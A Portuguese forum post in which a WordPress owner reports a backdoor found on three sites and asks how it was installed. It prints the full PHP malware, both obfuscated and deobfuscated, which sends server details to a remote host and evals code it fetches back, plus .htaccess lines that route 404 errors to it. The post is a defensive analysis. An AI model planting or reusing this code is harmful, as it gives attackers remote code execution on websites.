Backdoor

Percebí agora que 3 dos 6 WP que tenho rodando estão com algum tipo de trojan instalado. Dois arquivos foram gerados na pasta upload e subpastas:

207250.php (nome aparentemente aleatório)

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="cbb5c6e51bf51d29f57296a4c8e0a9d9") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

formatado e comentado:

<?php
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);

$z = "/? ".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);

$f = base64_decode("cnNzbmV3cy53cw=="); //base64 = rssnews.ws

if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"])=="cbb5c6e51bf51d29f57296a4c8e0a9d9") $f=$_REQUEST["id"];
if ((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z))); //base64 = http://ads.
else if ($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)) eval($c); //base64 = http://7.
else {
    $cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z); //base64 = http://71.
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $o=curl_exec($cu);
    curl_close($cu);
    eval($o);
};
die();
 ?>

.htaccess

Options -MultiViews
ErrorDocument 404 //wordpress/wp-content/uploads/2010/207250.php

Options -MultiViews
ErrorDocument 404 /wordpress/wp-content/uploads/2010/207250.php

Options -MultiViews
ErrorDocument 404 /wordpress/wp-content/uploads/2010/207250.php

O arquivo PHP parece estar dividido em 2 partes (if) uma envia para ads.rssnews.ws uma string com o URL do site, o FILE (caminho local tipo /home/site.com.br/etc/etc) e USER AGENT que acessou; a outra executa via eval uma string passada via query string.

A questão é: COMO ele se instalou alí? É evidente que tem alguma relação com o CHMOD 777 dado a pasta uploads, pois só alí eles são encontrados.